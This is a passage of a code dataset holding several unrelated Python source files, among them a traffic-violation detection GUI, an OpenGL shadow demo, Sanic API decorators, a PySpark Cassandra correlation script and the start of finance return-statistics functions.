int(vs.get(cv2.CAP_PROP_FPS))\n (W, H) = (int(vs.get(cv2.CAP_PROP_FRAME_WIDTH)), int(vs.get(cv2.CAP_PROP_FRAME_HEIGHT)))\n\n print(\"Original FPS:\", fps)\n\n Tr = float(thresh_field.get())\n length = int(float(dur_field.get()) * fps)\n std = float(std_field.get())\n tracker = Sort(length= length, std = std)\n KalmanBoxTracker.count = 0\n print(varck.get())\n if varck.get():\n if Out_path == None:\n Out_path = Vid_path[:-4]+'_saved.avi'\n result = cv2.VideoWriter(Out_path, \n cv2.VideoWriter_fourcc(*'XVID'), \n fps, (W,H))\n\n model = vehicleDetector(r'model\\vehicle-detection-0202.xml', H, W, Tr)\n model.load()\n ldvar = True\n w_ratio = m_width/W\n h_ratio = m_height/H\n ratio = min(w_ratio,h_ratio)\n\n (grabbed, frame) = vs.read()\n if grabbed:\n frame1 = frame.copy()\n image_utils.draw_text(frame1, 'Draw dots on the right hand side line and press Enter', \n (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n config.right_pts, right_image = image_utils.get_points(frame,frame1,W,H)\n frame2 = right_image.copy()\n image_utils.draw_text(frame2, 'Draw dots on the middle line and press Enter', \n (10,10), 
cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n config.middle_pts, middle_image = image_utils.get_points(right_image,frame2,W,H)\n frame3 = middle_image.copy()\n image_utils.draw_text(frame3, 'Draw dots on the left hand side line and press Enter', \n (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n config.left_pts, left_image = image_utils.get_points(middle_image,frame3,W,H)\n image_utils.draw_text(left_image, 'Drawing ground truths for lane is done. Press Enter to continue', \n (10,10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,255,255), 2)\n \n config.polygonR = Polygon(config.right_pts + config.middle_pts[: : -1])\n config.polygonL = Polygon(config.left_pts + config.middle_pts[: : -1])\n\n alpha = 0.15\n int_coords = lambda x: np.array(x).round().astype(np.int32)\n exteriorR = [int_coords(config.polygonR.exterior.coords)]\n exteriorL = [int_coords(config.polygonL.exterior.coords)]\n\n overlayR = left_image.copy()\n cv2.fillPoly(overlayR, exteriorR, color = (255, 81, 31))\n cv2.addWeighted(overlayR, alpha, left_image, 1 - alpha, 0, left_image)\n\n overlayL = left_image.copy()\n cv2.fillPoly(overlayL, exteriorL, color = (39, 237, 250))\n cv2.addWeighted(overlayL, alpha, left_image, 1 - alpha, 0, left_image)\n\n cv2.imshow(\"Image\", left_image)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n \n else:\n messagebox.showerror(title=\"Message\", message=\"No video selected or parameters are not given\",icon='error')\n\ndef playvid():\n global In\n global Vid_path\n global Out_path\n global vs\n global tracker\n global model \n global W\n global H\n global ldvar\n global result\n global ldvar\n global playvar\n \n if ldvar and playvar:\n \n (grabbed, frame) = vs.read()\n if grabbed:\n \n t1 = time.time()\n detections = model.predict(frame)\n trackers = tracker.update(detections, frame)\n t2 = time.time()\n latency = t2 - t1\n posList = []\n\n for dt in trackers:\n dt = dt.astype(np.int32)\n posList.append(compare.compare_pos(dt,W,H))\n # print(posList)\n frame = image_utils.draw_lanes(frame,config.right_pts,config.middle_pts,config.left_pts,W,H)\n ill_lane_count = 0\n parkCount = 0\n for idx, d in enumerate(trackers):\n d = d.astype(np.int32)\n frame, status = image_utils.draw_box(frame, d, W, H, idx, posList)\n if status == 'park':\n parkCount += 1\n elif status == 'ill_lane':\n ill_lane_count += 1\n\n frame = image_utils.draw_info(frame, latency, parkCount, ill_lane_count)\n\n if varck.get():\n result.write(frame)\n resized = cv2.resize(frame,(int(W*ratio),int(H*ratio)))\n frame = cv2.cvtColor(resized,cv2.COLOR_BGR2RGB)\n img = Image.fromarray(frame)\n imgtk = ImageTk.PhotoImage(image=img)\n lvid.imgtk = imgtk\n lvid.configure(image=imgtk)\n \n else:\n playvar = False\n if varck.get():\n result.release()\n\n vs.release()\n else:\n lvid.configure(text='Choose a video and play')\n lvid.after(1, playvid)\n \n\ndef stopvid():\n global playvar\n playvar = False\n \n\ndef Quit():\n gui.destroy()\n \n\ngui = Tk() \nv1 = DoubleVar()\nvar1 = IntVar()\n\nvarck = IntVar()\n\ngui.configure(background=\"light green\") \ngui.title(\"Illegal Vehicle Parking Detection System\") \ngui.geometry(\"1300x710\")\n\nInput = Button(gui, text=\"Input DIR\", fg=\"Black\",\n command=input_path,height=2, width=19)\nInput.place(x=111, y=30,anchor='c')\nOutput = Button(gui, text=\"Output DIR\", fg=\"Black\", \n command=output_path,height=2, width=19) \nOutput.place(x=111, y=100,anchor='c')\n\n\n#setting up labels for the text entry boxes\nthresh_label = Label(gui, text=\"Detection Threshold\", bg=\"light 
green\",font=(\"Helvetica\", 12)) \nthresh_label.place(x=111, y=160,anchor='c')\ndur_label = Label(gui, text=\"Duration\", bg=\"light green\",font=(\"Helvetica\", 12))\ndur_label.place(x=70, y=240,anchor='c')\nstd_label = Label(gui, text=\"Standard Deviation\", bg=\"light green\",font=(\"Helvetica\", 12)) \nstd_label.place(x=108, y=320,anchor='c')\n\n#setting up text entry boxes\nthresh_field = Entry(gui,width = 23)\nthresh_field.place(x=111, y=200,anchor='c')\ndur_field = Entry(gui,width = 23) \ndur_field.place(x=111, y=280,anchor='c')\nstd_field = Entry(gui,width = 23)\nstd_field.place(x=111, y=360,anchor='c')\n\nthresh_field.bind(\"\", focus1) \ndur_field.bind(\"\", focus2)\nstd_field.bind(\"\", focus3) \n\nSave = Checkbutton(gui, text=\"Save Video\", variable=varck, \n bg='light green',font=(\"Helvetica\", 10))\nSave.place(x=111, y=404,anchor='c')\n\nLoad = Button(gui, text=\"Load\", fg=\"Black\",\n command=loadmodel,height=2, width=19)\nLoad.place(x=111, y=460,anchor='c')\n\nPlay = Button(gui, text=\"Play\", fg=\"Black\",\n command=playen,height=2, width=19)\nPlay.place(x=111, y=530,anchor='c')\nStop = Button(gui, text=\"Stop\", fg=\"Black\", \n command=stopvid,height=2, width=19) \nStop.place(x=111, y=600,anchor='c')\n\nQuit = Button(gui, text=\"Quit\", fg=\"Black\", \n bg = 'red',command=Quit,height=2, width=19) \nQuit.place(x=111, y=670,anchor='c')\n\nlvid = Label(gui)\nlvid.place(x=740, y=350,anchor='c')\nplayvid()\n\ngui.mainloop()\n\n\n","repo_name":"tharakarehan/highway-lane-violation-detector","sub_path":"run_sort.py","file_name":"run_sort.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"19137179896","text":"#!/usr/bin/env python\r\n# Demonstrates simple planar shadows\r\n# Ben Smith\r\n# benjamin.coder.smith@gmail.com\r\n#\r\n# based heavily on shadow.cpp\r\n# OpenGL SuperBible\r\n# Program by Richard S. 
\r\n\r\nimport pyglet\r\nimport math\r\nfrom pyglet.gl import *\r\nfrom pyglet import window\r\nfrom pyglet.window import key\r\nimport sys\r\nsys.path.append(\"../shared\")\r\n\r\nfrom math3d import M3DVector3f, m3dFindNormal, M3DMatrix44f, m3dGetPlaneEquation, m3dMakePlanarShadowMatrix\r\nfrom fakeglut import glutSolidSphere\r\n\r\nxRot = 0.0\r\nyRot = 0.0\r\n\r\nlightArrayType = GLfloat * 4\r\nambientLight = lightArrayType(0.3, 0.3, 0.3, 1.0)\r\ndiffuseLight = lightArrayType(0.7, 0.7, 0.7, 1.0)\r\nspecular = lightArrayType(1.0, 1.0, 1.0, 1.0)\r\nlightPos = (GLfloat * 4)(-75.0, 150.0, -50.0, 0.0)\r\nspecref = (GLfloat * 4)(1.0, 1.0, 1.0, 1.0)\r\n\r\nshadowMat = M3DMatrix44f()\r\n\r\ndef DrawJet(nShadow):\r\n    \r\n    # Set material color, note we only have to set to black\r\n    # for the shadow once\r\n    if nShadow == 0:\r\n        glColor3ub(128, 128, 128)\r\n    else:\r\n        glColor3ub(0,0,0)\r\n\r\n    # Nose Cone - Points straight down\r\n    # Set material color\r\n    glBegin(GL_TRIANGLES)\r\n    \r\n    glNormal3f(0.0, -1.0, 0.0)\r\n    glVertex3f(0.0, 0.0, 60.0)\r\n    glVertex3f(-15.0, 0.0, 30.0)\r\n    glVertex3f(15.0,0.0,30.0)\r\n    \r\n\r\n    # Vertices for this panel\r\n    vPoints = [ M3DVector3f(15.0, 0.0, 30.0),\r\n                M3DVector3f(0.0, 15.0, 30.0),\r\n                M3DVector3f(0.0, 0.0, 60.0)]\r\n    \r\n    # Calculate the normal for the plane\r\n    vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n    glNormal3fv(vNormal)\r\n    glVertex3fv(vPoints[0])\r\n    glVertex3fv(vPoints[1])\r\n    glVertex3fv(vPoints[2])\r\n    \r\n    vPoints = [ M3DVector3f(0.0, 0.0, 60.0),\r\n                M3DVector3f(0.0, 15.0, 30.0),\r\n                M3DVector3f(-15.0, 0.0, 30.0)]\r\n    \r\n    vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n    glNormal3fv(vNormal)\r\n    glVertex3fv(vPoints[0])\r\n    glVertex3fv(vPoints[1])\r\n    glVertex3fv(vPoints[2])\r\n    \r\n\r\n\r\n    # Body of the Plane ############\r\n    vPoints = [ M3DVector3f(-15.0, 0.0, 30.0),\r\n                M3DVector3f(0.0, 15.0, 30.0),\r\n                M3DVector3f(0.0, 0.0, -56.0)]\r\n    \r\n    vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n    glNormal3fv(vNormal)\r\n    glVertex3fv(vPoints[0])\r\n    glVertex3fv(vPoints[1])\r\n    glVertex3fv(vPoints[2])\r\n    \r\n    vPoints = [ M3DVector3f(0.0, 0.0, -56.0),\r\n                M3DVector3f(0.0, 15.0, 30.0),\r\n                M3DVector3f(15.0, 0.0, 30.0)]\r\n    \r\n    vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n    glNormal3fv(vNormal)\r\n    glVertex3fv(vPoints[0])\r\n    glVertex3fv(vPoints[1])\r\n    glVertex3fv(vPoints[2])\r\n    \r\n    glNormal3f(0.0, -1.0, 0.0)\r\n    glVertex3f(15.0,0.0,30.0)\r\n    glVertex3f(-15.0, 0.0, 30.0)\r\n    glVertex3f(0.0, 0.0, -56.0)\r\n\r\n    #######################\r\n    # Left wing\r\n    # Large triangle for bottom of wing\r\n    \r\n    vPoints = [ M3DVector3f(0.0, 2.0, 27.0),\r\n                M3DVector3f(-60.0, 2.0, -8.0),\r\n                M3DVector3f(60, 2.0, -8.0)]\r\n    \r\n    vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n    glNormal3fv(vNormal)\r\n    glVertex3fv(vPoints[0])\r\n    glVertex3fv(vPoints[1])\r\n    glVertex3fv(vPoints[2])\r\n    \r\n    vPoints = [ M3DVector3f(60.0, 2.0, -8.0),\r\n                M3DVector3f(0.0, 7.0, -8.0),\r\n                M3DVector3f(0.0, 2.0, 27.0)]\r\n    \r\n    vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n    glNormal3fv(vNormal)\r\n    glVertex3fv(vPoints[0])\r\n    glVertex3fv(vPoints[1])\r\n    glVertex3fv(vPoints[2])\r\n    \r\n    vPoints = [ M3DVector3f(60.0, 2.0, -8.0),\r\n                M3DVector3f(-60.0, 2.0, -8.0),\r\n                M3DVector3f(0.0, 7.0, -8.0)]\r\n\r\n    vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n    glNormal3fv(vNormal)\r\n    glVertex3fv(vPoints[0])\r\n    glVertex3fv(vPoints[1])\r\n    
glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(0.0, 2.0, 27.0),\r\n M3DVector3f(0.0, 7.0, -8.0),\r\n M3DVector3f(-60.0, 2.0, -8.0)]\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n \r\n \r\n # Tail section###############\r\n # Bottom of back fin\r\n glNormal3f(0.0, -1.0, 0.0)\r\n glVertex3f(-30.0, -0.50, -57.0)\r\n glVertex3f(30.0, -0.50, -57.0)\r\n glVertex3f(0.0,-0.50,-40.0)\r\n\r\n vPoints = [ M3DVector3f(0.0, -0.5, -40.0),\r\n M3DVector3f(30.0, -0.5, -57.0),\r\n M3DVector3f(0.0, 4.0, -57.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(0.0, 4.0, -57.0),\r\n M3DVector3f(-30.0, -0.5, -57.0),\r\n M3DVector3f(0.0, -0.5, -40.0)]\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(30.0, -0.5, -57.0),\r\n M3DVector3f(-30.0, -0.5, -57.0),\r\n M3DVector3f(0.0, 4.0, -57.0)]\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n\r\n vPoints = [ M3DVector3f(0.0, 0.5, -40.0),\r\n M3DVector3f(3.0, 0.5, -57.0),\r\n M3DVector3f(0.0, 25.0, -65.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n \r\n vPoints = [ M3DVector3f(0.0, 25.0, -65.0),\r\n M3DVector3f(-3.0, 0.5, -57.0),\r\n M3DVector3f(0.0, 0.5, -40.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n \r\n vPoints = [ M3DVector3f(3.0, 0.5, -57.0),\r\n M3DVector3f(-3.0, 0.5, -57.0),\r\n M3DVector3f(0.0, 25.0, -65.0)]\r\n\r\n vNormal = m3dFindNormal(vPoints[0], vPoints[1], vPoints[2])\r\n glNormal3fv(vNormal)\r\n glVertex3fv(vPoints[0])\r\n glVertex3fv(vPoints[1])\r\n glVertex3fv(vPoints[2])\r\n\r\n\r\n glEnd()\r\n\r\nclass MainWindow(window.Window):\r\n def __init__(self, *args, **kwargs):\r\n global shadowMat\r\n window.Window.__init__(self, *args, **kwargs)\r\n\r\n # Any three points on the ground (counter clockwise order)\r\n points = [ M3DVector3f(-30.0, -149.0, -20.0),\r\n M3DVector3f(-30.0, -149.0, 20.0),\r\n M3DVector3f(40.0, -149.0, 20.0) ]\r\n\r\n glEnable(GL_DEPTH_TEST)\r\n glEnable(GL_CULL_FACE)\t\t# Do not calculate inside of jet\r\n glFrontFace(GL_CCW)\t\t# Counter clock-wise polygons face out\r\n\r\n # Enable Lighting\r\n glEnable(GL_LIGHTING)\r\n \r\n # Setup and enable light 0\r\n glLightfv(GL_LIGHT0, GL_AMBIENT, ambientLight)\r\n glLightfv(GL_LIGHT0, GL_DIFFUSE, diffuseLight)\r\n glLightfv(GL_LIGHT0, GL_SPECULAR, specular)\r\n glLightfv(GL_LIGHT0,GL_POSITION,lightPos)\r\n glEnable(GL_LIGHT0)\r\n \r\n # Enable color tracking\r\n glEnable(GL_COLOR_MATERIAL)\r\n \r\n # Set Material properties to follow glColor values\r\n glColorMaterial(GL_FRONT, GL_AMBIENT_AND_DIFFUSE)\r\n\r\n # All materials hereafter have full specular reflectivity\r\n # with a high shine\r\n glMaterialfv(GL_FRONT, GL_SPECULAR, specref)\r\n glMateriali(GL_FRONT, GL_SHININESS, 128)\r\n\r\n # light blue background\r\n 
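# (glClearColor takes normalized RGBA components; (0.0, 0.0, 1.0, 1.0) clears to a solid blue)\r\n        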
glClearColor(0.0, 0.0, 1.0, 1.0)\r\n        \r\n        # Get the plane equation from three points on the ground\r\n\r\n        vPlaneEquation = m3dGetPlaneEquation(points[0], points[1], points[2])\r\n\r\n        # Calculate projection matrix to draw shadow on the ground\r\n        shadowMat = m3dMakePlanarShadowMatrix(vPlaneEquation, lightPos)\r\n        glEnable(GL_NORMALIZE)\r\n        \r\n    # Called to draw scene\r\n    def on_draw(self):\r\n        # Clear the window with current clearing color\r\n        glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\r\n\r\n        # Draw the ground; we do manual shading to a darker green\r\n        # in the background to give the illusion of depth\r\n        glBegin(GL_QUADS)\r\n        \r\n        glColor3ub(0,32,0)\r\n        glVertex3f(400.0, -150.0, -200.0)\r\n        glVertex3f(-400.0, -150.0, -200.0)\r\n        glColor3ub(0,255,0)\r\n        glVertex3f(-400.0, -150.0, 200.0)\r\n        glVertex3f(400.0, -150.0, 200.0)\r\n        \r\n        glEnd()\r\n\r\n        # Save the matrix state and do the rotations\r\n        glPushMatrix()\r\n\r\n        # Draw jet at new orientation, put light in correct position\r\n        # before rotating the jet\r\n        glEnable(GL_LIGHTING)\r\n        glLightfv(GL_LIGHT0,GL_POSITION,lightPos)\r\n        glRotatef(xRot, 1.0, 0.0, 0.0)\r\n        glRotatef(yRot, 0.0, 1.0, 0.0)\r\n\r\n        DrawJet(0)\r\n\r\n        # Restore original matrix state\r\n        glPopMatrix()\r\n\r\n\r\n        # Get ready to draw the shadow and the ground\r\n        # First disable lighting and save the projection state\r\n        glDisable(GL_DEPTH_TEST)\r\n        glDisable(GL_LIGHTING)\r\n        glPushMatrix()\r\n\r\n        # Multiply by shadow projection matrix\r\n        glMultMatrixf(shadowMat)\r\n\r\n        # Now rotate the jet around in the new flattened space\r\n        glRotatef(xRot, 1.0, 0.0, 0.0)\r\n        glRotatef(yRot, 0.0, 1.0, 0.0)\r\n\r\n        # Pass true to indicate drawing shadow\r\n        DrawJet(1)\r\n\r\n        # Restore the projection to normal\r\n        glPopMatrix()\r\n\r\n        # Draw the light source\r\n        glPushMatrix()\r\n        glTranslatef(lightPos[0],lightPos[1], lightPos[2])\r\n        glColor3ub(255,255,0)\r\n        glutSolidSphere(5.0,10,10)\r\n        glPopMatrix()\r\n\r\n        # Restore lighting state variables\r\n        glEnable(GL_DEPTH_TEST)\r\n\r\n    def on_resize(self, w, h):\r\n        # Prevent a divide by zero\r\n        if(h == 0):\r\n            h = 1\r\n        \r\n        # Set Viewport to window dimensions\r\n        glViewport(0, 0, w, h)\r\n\r\n        # Reset coordinate system\r\n        glMatrixMode(GL_PROJECTION)\r\n        glLoadIdentity()\r\n\r\n        # Produce the perspective projection\r\n        fAspect = float(w)/float(h)\r\n        gluPerspective(60.0, fAspect, 200.0, 500.0)\r\n        \r\n        glMatrixMode(GL_MODELVIEW)\r\n        glLoadIdentity()\r\n        \r\n        # Move out Z axis so we can see everything\r\n        glTranslatef(0.0, 0.0, -400.0)\r\n        glLightfv(GL_LIGHT0, GL_POSITION, lightPos)\r\n\r\n    def on_key_press(self, symbol, modifier):\r\n        global xRot, yRot\r\n        if symbol == key.UP:\r\n            xRot -= 5.0\r\n        elif symbol == key.DOWN:\r\n            xRot += 5.0\r\n        elif symbol == key.LEFT:\r\n            yRot -= 5.0\r\n        elif symbol == key.RIGHT:\r\n            yRot += 5.0\r\n        \r\n        xRot = float(int(xRot) % 360)\r\n        yRot = float(int(yRot) % 360)\r\n\r\n# Main program entry point\r\nif __name__ == '__main__':\r\n    w = MainWindow(800, 600, caption='Shadow', resizable=True)\r\n    pyglet.app.run()\r\n","repo_name":"BenSmith/PythonOpenGLSuperBible4","sub_path":"chapt05/shadow.py","file_name":"shadow.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"29"} +{"seq_id":"38905763935","text":"import inspect\nfrom functools import wraps\nfrom typing import Callable, Type, TypeVar, Generic, Dict, Optional, Union\n\nfrom sanic.response import HTTPResponse\n\nfrom sanic_ext.exceptions import InitError
\nfrom sanic_ext.extensions.openapi.builders import OperationStore\nfrom sanic_ext.utils.extraction import extract_request\n\nfrom pydantic import BaseModel, ValidationError, Field, SerializeAsAny\n\nfrom grpc.aio import AioRpcError\nfrom grpc import StatusCode\n\nfrom api.utils.tools import component\nfrom utils.Exceptions import _321CQUException\n\n__all__ = ['api_request', 'api_response', 'handle_grpc_error']\n\nT = TypeVar(\"T\", bound=BaseModel)\n\n\nclass BaseApiResponse(BaseModel, Generic[T]):\n    \"\"\"\n    API response template; the returned ApiResponse subclass is filled into data\n    \"\"\"\n    status: int = Field(title='Response status', description='1 on success, 0 on failure')\n    msg: str = Field(title='Response message', description='`success` on success, otherwise the related error message')\n    data: SerializeAsAny[T | dict] = Field(title=\"Data\")\n\n\ndef api_request(\n        json: Type[BaseModel] | None = None,\n        form: Type[BaseModel] | None = None,\n        query: Type[BaseModel] | None = None,\n        body_argument: str = \"body\",\n        query_argument: str = \"query\",\n        **kwargs\n) -> Callable:\n    \"\"\"\n    Decorator that implements request parameter validation and OpenAPI doc generation\n\n    **json and form must not be set at the same time**\n\n    :param json: data model the request body should map to when read as JSON\n    :param form: data model the request body should map to when read as form data\n    :param query: data model the route query parameters should map to\n    :param body_argument: name under which the parsed body is injected, defaults to \"body\"\n    :param query_argument: name under which the parsed query parameters are injected, defaults to \"query\"\n    :param kwargs: additional parameters to show in /docs (must conform to the OpenAPI spec)\n    \"\"\"\n\n    if json and form:\n        raise InitError(\"Cannot define both a form and json route validator\")\n\n    def decorator(f):\n        title = json.model_config.get(\"title\") if json is not None else \\\n            (form.model_config.get(\"title\") if form is not None else None)\n        body_content = {\n            \"application/json\": component(json)\n        } if json is not None else (\n            {\n                \"application/x-www-form-urlencoded\": component(form)\n            } if form is not None else None\n        )\n        params = {**kwargs}\n\n        @wraps(f)\n        async def decorated_function(*args, **kwargs):\n            request = extract_request(*args)\n            try:\n                if json:\n                    kwargs[body_argument] = json.model_validate(request.json)\n                elif form:\n                    kwargs[body_argument] = form.model_validate(request.form)\n                if query:\n                    parsed_args = {}\n                    for key, value in request.args.items():\n                        parsed_args[key] = value[0] if len(value) == 1 else value\n                    kwargs[query_argument] = query.model_validate(parsed_args)\n            except ValidationError as e:\n                raise _321CQUException(error_info=\"Invalid request parameters\", quite=True)\n            retval = f(*args, **kwargs)\n            if inspect.isawaitable(retval):\n                retval = await retval\n            return retval\n\n        # Use sanic-ext's OperationStore for automatic doc generation; see its openapi.body decorator for reference\n        if f in OperationStore():\n            OperationStore()[decorated_function] = OperationStore().pop(f)\n        if body_content is not None:\n            OperationStore()[decorated_function].body(body_content, **params)\n        if query is not None:\n            schema = query.model_json_schema(ref_template=\"#/components/schemas/{model}\")\n            for name, value in inspect.get_annotations(query).items():\n                ex_param = {}\n                if schema.get('properties') is not None and schema['properties'].get(name) is not None:\n                    ex_param = schema['properties'][name]\n\n                description = (ex_param.get('title') if ex_param.get('title') else '') + (\n                    ex_param.get('description') if ex_param.get('description') else '')\n                if description == '':\n                    description = None\n\n                OperationStore()[decorated_function].parameter(name, value, 'query', description=description)\n        return decorated_function\n\n    return decorator\n\n\ndef api_response(retval: Optional[Union[Type[BaseModel], Dict, HTTPResponse]] = None, status: int = 200,\n                 description: str = '',\n                 *, auto_wrap: bool = True, **kwargs):\n    \"\"\"\n    Decorator that auto-wraps return values and generates the API docs page
\n    :param retval: return value info; may be an ApiResponse subclass or a dict; when empty, the data field of the response is set to None\n    :param status: HTTP status code of the response\n    :param description: description of the return value, shown on the /docs page\n    :param auto_wrap: keyword-only argument; when False, the decorated function's result is returned as-is\n    :param kwargs: additional parameters to show in /docs (must conform to the OpenAPI spec)\n    \"\"\"\n\n    def decorator(f):\n        @wraps(f)\n        async def decorated_function(*args, **kwargs):\n            ret = f(*args, **kwargs)\n            if inspect.isawaitable(ret):\n                ret = await ret\n\n            kwargs[\"status\"] = status\n            if auto_wrap:\n                return HTTPResponse(\n                    BaseApiResponse[(retval if retval is not None else Dict)](\n                        status=1, msg='success', data=(ret if ret is not None else {})\n                    ).model_dump_json(),\n                    content_type=\"application/json\")\n            else:\n                return ret\n\n        # Use sanic-ext's OperationStore for automatic doc generation; see its openapi.body decorator for reference\n        if f in OperationStore():\n            OperationStore()[decorated_function] = OperationStore().pop(f)\n\n        if auto_wrap:\n            if inspect.isclass(retval) and issubclass(retval, BaseModel):\n                OperationStore()[decorated_function].response(\n                    status, {\n                        'application/json': component(BaseApiResponse[retval])\n                    },\n                    description, **kwargs\n                )\n            else:\n                base_retval = {'status': 1, 'msg': 'success', 'data': retval}\n                OperationStore()[decorated_function].response(\n                    status, {'application/json': component(BaseApiResponse[Dict])}, description, **kwargs)\n        else:\n            OperationStore()[decorated_function].response(status, retval, description, **kwargs)\n        return decorated_function\n\n    return decorator\n\n\ndef handle_grpc_error(func):\n    \"\"\"\n    Handle AioRpcError; the returned HttpResponse carries a 503 status code and the detailed grpc error info\n    \"\"\"\n\n    @wraps(func)\n    async def wrapped_function(*args, **kwargs):\n        try:\n            ret = func(*args, **kwargs)\n            if inspect.isawaitable(ret):\n                ret = await ret\n            return ret\n        except AioRpcError as e:\n            if e.code() == StatusCode.UNAVAILABLE:\n                raise _321CQUException(error_info=e.details() if e.details() is not None else \"Service call error\",\n                                       extra=e.details(), status_code=503, quite=False)\n            elif e.code() == StatusCode.INVALID_ARGUMENT:\n                raise _321CQUException(error_info=e.details() if e.details() is not None else \"Service call error\",\n                                       extra=e.details(), status_code=503, quite=True)\n            raise _321CQUException(error_info=\"Service call error\", extra=e.details(), status_code=503, quite=False)\n\n    return wrapped_function\n","repo_name":"ZhuLegend/321CQU_APIGateway","sub_path":"api/utils/ApiInterface.py","file_name":"ApiInterface.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"29998173165","text":"from pyspark import SparkConf, SparkContext\nimport sys,re\nfrom uuid import UUID,uuid4\nfrom pyspark.sql import SparkSession,functions as fu, Row, types\nassert sys.version_info >= (3, 5)\n\ndef corr_coeff(corr):\n    num = (corr['sum(for_n)']*corr['sum(x*y)']) - (corr['sum(x)']*corr['sum(y)'])\n    den_1 = fu.sqrt((corr['sum(for_n)']*corr['sum(x^2)']) - (corr['sum(x)']**2))\n    den_2 = fu.sqrt((corr['sum(for_n)']*corr['sum(y^2)']) - (corr['sum(y)']**2))\n    r = num / (den_1*den_2)\n    return r\n\ndef main(keyspace,table):\n    cluster_seeds = ['199.60.17.188', '199.60.17.216']\n    spark = SparkSession.builder.appName('Spark Cassandra example').config('spark.cassandra.connection.host', ','.join(cluster_seeds)).getOrCreate()\n    df = spark.read.format(\"org.apache.spark.sql.cassandra\").options(table=table, keyspace=keyspace).load()\n    log_corr = df.select('host','bytes')\n    x_y = log_corr.groupBy(log_corr['host']).agg(fu.count(log_corr['bytes']).alias('x'),fu.sum(log_corr['bytes']).alias('y'))\n    all_vals = x_y.withColumn('for_n', 
x_y['x']/x_y['x']).withColumn('x^2', x_y['x']**2).withColumn('y^2', x_y['y']**2).withColumn('x*y', x_y['x']*x_y['y']).drop(x_y['host'])\n corr = all_vals.groupBy().sum()\n r = corr.withColumn('r',corr_coeff(corr))\n r_sq = r.withColumn('r^2',r['r']**2)\n to_out = r_sq.select('r','r^2')\n toOut = list(to_out.collect()[0])\n print(\"r = \",toOut[0],\"\\nr^2 = \",toOut[1])\n\n\nif __name__ == '__main__':\n conf = SparkConf().setAppName('spark cassandra')\n sc = SparkContext(conf=conf)\n assert sc.version >= '2.3' # make sure we have Spark 2.3+\n keyspace = sys.argv[1]\n table = sys.argv[2]\n main(keyspace,table)\n","repo_name":"sachinnpraburaj/Big-Data-Programming-1","sub_path":"19. Logs Correlation Cassandra/correlate_logs_cassandra.py","file_name":"correlate_logs_cassandra.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19564456804","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef skewness(r):\n \"\"\"\n Alternative to scipy.stats.skew()\n Computes the skewness of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**3).mean()\n return exp/sigma_r**3\n\n\ndef kurtosis(r):\n \"\"\"\n Alternative to scipy.stats.kurtosis()\n Computes the kurtosis of the supplied Series or DataFrame\n Returns a float or a Series\n \"\"\"\n demeaned_r = r - r.mean()\n # use the population standard deviation, so set dof=0\n sigma_r = r.std(ddof=0)\n exp = (demeaned_r**4).mean()\n return exp/sigma_r**4\n\ndef compound(r):\n \"\"\"\n returns the result of compounding the set of returns in r\n \"\"\"\n return np.expm1(np.log1p(r).sum()) \n\ndef annualize_rets(r, periods_per_year):\n \"\"\"\n Annualizes a set of returns\n We should infer the periods per year\n but that is currently left as an exercise\n to the reader :-)\n \"\"\"\n compounded_growth = (1+r).prod()\n n_periods = r.shape[0]\n return compounded_growth**(periods_per_year/n_periods)-1\n\n\ndef annualize_vol(r, periods_per_year):\n \"\"\"\n Annualizes the vol of a set of returns\n 